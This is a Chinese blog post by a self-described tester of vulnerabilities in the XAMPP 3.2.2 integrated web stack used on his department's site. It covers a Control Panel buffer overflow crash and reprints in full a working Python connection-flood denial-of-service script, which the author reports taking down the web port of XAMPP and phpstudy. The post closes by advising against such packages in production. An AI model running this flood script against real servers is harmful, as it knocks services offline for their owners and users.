最近在看通用漏洞,发现我们部门网站使用了xampp3.2.2做网站部署,使用这种继承软件包会有很多问题,在网上搜了搜,发现最近还有公布的漏洞。

  一个是今年9月出的一个XAMPP Control Panel 3.2.2 Buffer Overflow;另一个是几年前的一个远程拒绝服务,就是简单的dos或者cc。

#0x01 XAMPP Control Panel 3.2.2 Buffer Overflow

  网上共找到两种Poc:

  http://www.vfocus.net/art/20181220/15036.html

  http://www.vfocus.net/art/20180917/14798.html

  下载运行脚本,会生成一个exploit.txt文件。

  在Control Panel里点击右上角的config,将exlpoit里的内容复制到editor和browser里,保存。

然后点击查看httpd.conf文件,会弹出崩溃。

崩溃后web进程并没有中断,并没有达成拒绝服务,只是程序崩溃而已,貌似价值不高。

#0x02XAMPP Control Panel - Denial Of Service

  找到一个poc:

  https://www.anquanke.com/vul/id/1067740

  大体意思就是在xampp监听的这些端口:

(MySQL) 3306 v3.2.2
(Tomcat) 8080 (XAMPP v3.1.0)
(FileZilla) 21
(Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.

  如果发送大量的垃圾数据,就会造成内存崩溃和拒绝服务。

POC:

import socket

print "XAMPP Control Panel DOS"
print "Discovery: John Page (hyp3rlinx)"
print "ApparitionSec"
print "hyp3rlinx.altervista.org\r\n"

IP = raw_input("[IP]> ")
PORT = raw_input("[PORT]> ")

arr=[]
c=0
while 1:
    try:
        arr.append(socket.create_connection((IP,PORT)))
        arr[c].send("DOOM")
        print "Die!"
        c+=1
    except socket.error:
        print "[+] Done! "
        raw_input()
        break

对xampp的80端口尝试攻击:

效果显著。中断脚本后,网站即可恢复。

想到其他建站工具也可能有这种问题,又拿脚本测了下phpstudy,同样可以实现拒绝服务。

#0x03 

  网站正式部署最好不要用这些集成工具包,一个是很容易由于默认配置遭到入侵,还有这种dos攻击抗性太差。

 

posted on 2018-12-24 12:10  apossin  阅读(334)  评论(0编辑  收藏  举报